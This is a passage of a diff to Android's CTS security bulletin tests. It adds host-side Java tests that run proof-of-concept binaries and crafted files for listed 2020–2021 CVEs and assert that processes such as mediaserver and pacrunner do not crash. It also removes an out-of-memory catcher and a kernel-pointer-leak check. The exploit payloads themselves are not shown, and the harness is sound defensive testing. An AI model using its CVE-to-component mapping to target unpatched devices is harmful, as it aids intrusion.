* http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import java.util.Arrays; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0224 extends SecurityTestCase { + + /** + * b/147664838 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-07") + @Test + public void testPocCVE_2020_0224() throws Exception { + AdbUtils.runProxyAutoConfig("cve_2020_0224", getDevice()); + AdbUtils.assertNoCrashes(getDevice(), new CrashUtils.Config() + .setProcessPatterns("pacrunner") + .checkMinAddress(false) + .appendSignals(CrashUtils.SIGABRT)); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0240.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0240.java new file mode 100644 index 00000000000..352274e9c64 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0240.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0240 extends SecurityTestCase { + + /** + * b/150706594 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-08") + @Test + public void testPocCVE_2020_0240() throws Exception { + String inputFiles[] = {"cve_2020_0240.pac"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0240", + AdbUtils.TMP_PATH + inputFiles[0], inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java new file mode 100644 index 00000000000..4c2b91d63a6 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0243 extends SecurityTestCase { + + /** + * b/151644303 + * Vulnerability Behaviour: SIGSEGV in mediaserver + */ + @SecurityTest(minPatchLevel = "2020-08") + @Test + public void testPocCVE_2020_0243() throws Exception { + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2020-0243", getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns("mediaserver"); + testConfig.config.checkMinAddress(false); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java index 81100e60a4b..2d5237a7186 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java @@ -20,27 +20,24 @@ import android.platform.test.annotations.SecurityTest; import org.junit.Test; import org.junit.runner.RunWith; import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.device.ITestDevice; -import static org.junit.Assume.assumeTrue; -import static org.junit.Assume.assumeThat; -import static org.hamcrest.CoreMatchers.equalTo; -import static org.junit.Assert.*; +import static org.junit.Assume.*; @RunWith(DeviceJUnit4ClassRunner.class) -public class CVE_2020_0461 extends SecurityTestCase { +public class CVE_2020_0381 extends SecurityTestCase { /** - * b/162741784 + * b/150159669 + * Vulnerability Behaviour: SIGSEGV in self */ + @SecurityTest(minPatchLevel = "2020-09") @Test - @SecurityTest(minPatchLevel = "2020-12") - public void testPocCVE_2020_0461() throws Exception { - assumeTrue(containsDriver(getDevice(), - "/sys/devices/system/cpu/vulnerabilities/meltdown")); - String meltdown = AdbUtils.runCommandLine( - "cat /sys/devices/system/cpu/vulnerabilities/meltdown", getDevice()); - assertFalse(meltdown.startsWith("Vulnerable")); - assertTrue(meltdown.startsWith("Not affected") || - meltdown.startsWith("Mitigation")); + public void testPocCVE_2020_0381() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media")); + String inputFiles[] = {"cve_2020_0381.xmf", "cve_2020_0381.info"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0381", + AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1], + inputFiles, AdbUtils.TMP_PATH, getDevice()); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java new file mode 100644 index 00000000000..2e1ca03f0a4 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java @@ -0,0 +1,42 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import static org.junit.Assume.assumeFalse; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0383 extends SecurityTestCase { + + /** + * b/150160279 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-09") + @Test + public void testPocCVE_2020_0383() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media")); + String inputFiles[] = {"cve_2020_0383.xmf", "cve_2020_0383.info"}; + String binaryName = "CVE-2020-0383"; + AdbUtils.runPocAssertNoCrashesNotVulnerable(binaryName, + AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1], + inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java new file mode 100644 index 00000000000..2f7b5d90eb7 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java @@ -0,0 +1,43 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.device.ITestDevice; + +import static org.junit.Assume.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0384 extends SecurityTestCase { + + /** + * b/150159906 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-09") + @Test + public void testPocCVE_2020_0384() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media")); + String inputFiles[] = {"cve_2020_0384.xmf", "cve_2020_0384.info"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0384", + AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1], + inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java new file mode 100644 index 00000000000..e7aefeb9638 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java @@ -0,0 +1,43 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.device.ITestDevice; + +import static org.junit.Assume.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0385 extends SecurityTestCase { + + /** + * b/150160041 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-09") + @Test + public void testPocCVE_2020_0385() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media")); + String inputFiles[] = {"cve_2020_0385.xmf", "cve_2020_0385.info"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0385", + AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1], + inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java new file mode 100644 index 00000000000..dd2aff8ff0a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java @@ -0,0 +1,63 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.AppModeInstant; +import android.platform.test.annotations.AppModeFull; +import android.util.Log; +import android.platform.test.annotations.SecurityTest; + +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test; + +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; + +/** + * Test that collects test results from test package android.security.cts.CVE_2021_0305. + * + * When this test builds, it also builds a support APK containing + * {@link android.sample.cts.CVE_2021_0305.SampleDeviceTest}, the results of which are + * collected from the hostside and reported accordingly. + */ +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0305 extends BaseHostJUnit4Test { + private static final String TEST_PKG = "android.security.cts.CVE_2021_0305"; + private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest"; + private static final String TEST_APP = "CVE-2021-0305.apk"; + + @Before + public void setUp() throws Exception { + uninstallPackage(getDevice(), TEST_PKG); + } + + @Test + @SecurityTest(minPatchLevel = "2020-09") + @AppModeFull + public void testRunDeviceTestsPassesFull() throws Exception { + installPackage(); + Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "testClick")); + } + + private void installPackage() throws Exception { + installPackage(TEST_APP, new String[0]); + } +} + diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java new file mode 100644 index 00000000000..3d3f4a8bc15 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.compatibility.common.util.CrashUtils; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0330 extends SecurityTestCase { + + /** + * b/170732441 + * Vulnerability Behaviour: SIGSEGV in storaged + */ + @SecurityTest(minPatchLevel = "2021-02") + @Test + public void testPocCVE_2021_0330() throws Exception { + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2021-0330", getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns("storaged"); + testConfig.config.checkMinAddress(false); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java new file mode 100644 index 00000000000..2160aca84bd --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.device.ITestDevice; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0393 extends SecurityTestCase { + + /** + * b/168041375 + * Vulnerability Behavior: SIGSEGV in pacrunner + */ + @SecurityTest(minPatchLevel = "2021-03") + @Test + public void testPocCVE_2021_0393() throws Exception { + pocPusher.only64(); + AdbUtils.runProxyAutoConfig("cve_2021_0393", getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java new file mode 100644 index 00000000000..3df46a76740 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import static org.junit.Assert.assertTrue; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0396 extends SecurityTestCase { + + /** + * b/160610106 + * Vulnerability Behaviour: SIGSEGV in pacrunner + */ + @SecurityTest(minPatchLevel = "2021-03") + @Test + public void testPocCVE_2021_0396() throws Exception { + AdbUtils.runProxyAutoConfig("cve_2021_0396", getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java new file mode 100644 index 00000000000..935b6010aaa --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java @@ -0,0 +1,37 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0430 extends SecurityTestCase { + + /** + * b/178725766 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2021-04") + @Test + public void testPocCVE_2021_0430() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0430", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java new file mode 100644 index 00000000000..25802a00eb2 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java @@ -0,0 +1,38 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0439 extends SecurityTestCase { + + /** + * b/174243830 + * Vulnerability Behaviour: SIGSEGV in system_server + */ + @SecurityTest(minPatchLevel = "2021-04") + @Test + public void testPocCVE_2021_0439() throws Exception { + String processPatternStrings[] = {"system_server"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0439", null, getDevice(), + processPatternStrings); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java deleted file mode 100644 index d97c4dbfc0f..00000000000 --- a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java +++ /dev/null @@ -1,228 +0,0 @@ -/* - * Copyright (C) 2018 The Android Open Source Project - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package android.security.cts; - -import com.android.tradefed.device.CollectingOutputReceiver; -import com.android.tradefed.device.DeviceNotAvailableException; -import com.android.tradefed.device.ITestDevice; -import com.android.tradefed.testtype.DeviceTestCase; -import com.android.tradefed.device.BackgroundDeviceAction; - -import android.platform.test.annotations.RootPermissionTest; - -import java.io.BufferedOutputStream; -import java.io.File; -import java.io.FileOutputStream; -import java.io.IOException; -import java.io.InputStream; -import java.io.OutputStream; -import java.util.Scanner; -import java.util.regex.Pattern; -import java.util.regex.Matcher; -import java.util.Map; -import java.util.HashMap; -import java.util.concurrent.ConcurrentHashMap; -import com.android.ddmlib.MultiLineReceiver; -import com.android.ddmlib.Log; -import com.android.ddmlib.TimeoutException; -import java.lang.ref.WeakReference; - -/** - * A utility to monitor the device lowmemory state and reboot when low. Without this, tests that - * cause an OOM can sometimes cause ADB to become unresponsive indefinitely. Usage is to create an - * instance per instance of SecurityTestCase and call start() and stop() matching to - * SecurityTestCase setup() and teardown(). - */ -public class HostsideOomCatcher { - - private static final String LOG_TAG = "HostsideOomCatcher"; - - private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = (long)(1.5 * 1024 * 1024); //1.5GB - private static Map<String, WeakReference<BackgroundDeviceAction>> oomCatchers = - new ConcurrentHashMap<>(); - private static Map<String, Long> totalMemories = new ConcurrentHashMap<>(); - - private boolean isLowMemoryDevice = false; - - private SecurityTestCase context; - - /** - * test behavior when oom is detected. - */ - public enum OomBehavior { - FAIL_AND_LOG, // normal behavior - PASS_AND_LOG, // skip tests that oom low memory devices - FAIL_NO_LOG, // tests that check for oom - } - private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads - private boolean oomDetected = false; // accessed across threads - - public HostsideOomCatcher(SecurityTestCase context) { - this.context = context; - } - - /** - * Utility to get the device memory total by reading /proc/meminfo and returning MemTotal - */ - private static long getMemTotal(ITestDevice device) throws DeviceNotAvailableException { - // cache device TotalMem to avoid an adb shell for every test. - String serial = device.getSerialNumber(); - Long totalMemory = totalMemories.get(serial); - if (totalMemory == null) { - String memInfo = device.executeShellCommand("cat /proc/meminfo"); - Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]"); - Matcher matcher = pattern.matcher(memInfo); - if (matcher.find()) { - totalMemory = Long.parseLong(matcher.group(1)); - } else { - throw new RuntimeException("Could not get device memory total."); - } - Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, - "Device " + serial + " has " + totalMemory + "KB total memory."); - totalMemories.put(serial, totalMemory); - } - return totalMemory; - } - - /** - * Start the hostside oom catcher thread for the test. - * Match this call to SecurityTestCase.setup(). - */ - public synchronized void start() throws Exception { - long totalMemory = getMemTotal(getDevice()); - isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB; - - // reset test oom behavior - // Devices should fail tests that OOM so that they'll be ran again with --retry. - // If the test OOMs because previous tests used the memory, it will likely pass - // on a second try. - oomBehavior = OomBehavior.FAIL_AND_LOG; - oomDetected = false; - - // Cache OOM detection in separate persistent threads for each device. - WeakReference<BackgroundDeviceAction> reference = - oomCatchers.get(getDevice().getSerialNumber()); - BackgroundDeviceAction oomCatcher = null; - if (reference != null) { - oomCatcher = reference.get(); - } - if (oomCatcher == null || !oomCatcher.isAlive() || oomCatcher.isCancelled()) { - AdbUtils.runCommandLine("am start com.android.cts.oomcatcher/.OomCatcher", getDevice()); - - oomCatcher = new BackgroundDeviceAction( - "logcat -c && logcat OomCatcher:V *:S", - "Oom Catcher background thread", - getDevice(), new OomReceiver(getDevice()), 0); - - oomCatchers.put(getDevice().getSerialNumber(), new WeakReference<>(oomCatcher)); - oomCatcher.start(); - } - } - - /** - * Stop the hostside oom catcher thread. - * Match this call to SecurityTestCase.setup(). - */ - public static void stop(String serial) { - WeakReference<BackgroundDeviceAction> reference = oomCatchers.get(serial); - if (reference != null) { - BackgroundDeviceAction oomCatcher = reference.get(); - if (oomCatcher != null) { - oomCatcher.cancel(); - } - } - } - - /** - * Check every test teardown to see if the device oomed during the test. - */ - public synchronized boolean isOomDetected() { - return oomDetected; - } - - /** - * Return the current test behavior for when oom is detected. - */ - public synchronized OomBehavior getOomBehavior() { - return oomBehavior; - } - - /** - * Flag meaning the test will likely fail on devices with low memory. - */ - public synchronized void setHighMemoryTest() { - if (isLowMemoryDevice) { - oomBehavior = OomBehavior.PASS_AND_LOG; - } else { - oomBehavior = OomBehavior.FAIL_AND_LOG; - } - } - - /** - * Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability - * intentionally OOMs the device. - */ - public synchronized void setOomTest() { - oomBehavior = OomBehavior.FAIL_NO_LOG; - } - - private ITestDevice getDevice() { - return context.getDevice(); - } - - /** - * Read through logcat to find when the OomCatcher app reports low memory. Once detected, reboot - * the device to prevent a soft reset with the possiblity of ADB becomming unresponsive. - */ - class OomReceiver extends MultiLineReceiver { - - private ITestDevice device = null; - private boolean isCancelled = false; - - public OomReceiver(ITestDevice device) { - this.device = device; - } - - @Override - public void processNewLines(String[] lines) { - for (String line : lines) { - if (Pattern.matches(".*Low memory.*", line)) { - // low memory detected, reboot device to clear memory and pass test - isCancelled = true; - Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, - "lowmemorykiller detected; rebooting device."); - synchronized (HostsideOomCatcher.this) { // synchronized for oomDetected - oomDetected = true; // set HostSideOomCatcher var - } - try { - device.nonBlockingReboot(); - device.waitForDeviceOnline(60 * 2 * 1000); // 2 minutes - } catch (Exception e) { - Log.e(LOG_TAG, e.toString()); - } - return; // we don't need to process remaining lines in the array - } - } - } - - @Override - public boolean isCancelled() { - return isCancelled; - } - } -} - diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java index 39b7ada09f6..0895607d122 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java @@ -44,7 +44,6 @@ public class Poc16_05 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2016-05") public void testPocCVE_2015_1805() throws Exception { - getOomCatcher().setHighMemoryTest(); AdbUtils.runPoc("CVE-2015-1805", getDevice(), TIMEOUT_NONDETERMINISTIC); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java index 4367a61a149..835c1cf51f3 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java @@ -58,7 +58,6 @@ public class Poc16_07 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2016-07") public void testPocCVE_2016_3747() throws Exception { - getOomCatcher().setHighMemoryTest(); AdbUtils.runPocAssertNoCrashes("CVE-2016-3747", getDevice(), "mediaserver"); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java index 1ec6d891e6b..797e58d76e0 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java @@ -29,35 +29,6 @@ import static org.junit.Assert.*; @RunWith(DeviceJUnit4ClassRunner.class) public class Poc17_05 extends SecurityTestCase { - /** - * b/34277115 - */ - @Test - @SecurityTest(minPatchLevel = "2017-05") - public void testPocCVE_2017_0630() throws Exception { - if (containsDriver(getDevice(), "/sys/kernel/debug/tracing/printk_formats")) { - String printkFormats = AdbUtils.runCommandLine( - "cat /sys/kernel/debug/tracing/printk_formats", getDevice()); - String[] pointerStrings = printkFormats.split("\n"); - assertNotKernelPointer(new Callable<String>() { - int index; - @Override - public String call() { - for (; index < pointerStrings.length; index++) { - String line = pointerStrings[index]; - String pattern = "0x"; - int startIndex = line.indexOf(pattern); - if (startIndex == -1) { - continue; - } - return line.substring(startIndex + pattern.length()); - } - return null; - } - }, null); - } - } - /* * CVE-2016-5862 */ diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java index 44b0d892484..dc41d7c201f 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java @@ -33,7 +33,6 @@ public class Poc18_04 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-04") public void testPocCVE_2017_13286() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice()); } @@ -44,7 +43,6 @@ public class Poc18_04 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-04") public void testPocCVE_2017_13288() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13288", getDevice()); } @@ -55,7 +53,6 @@ public class Poc18_04 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-04") public void 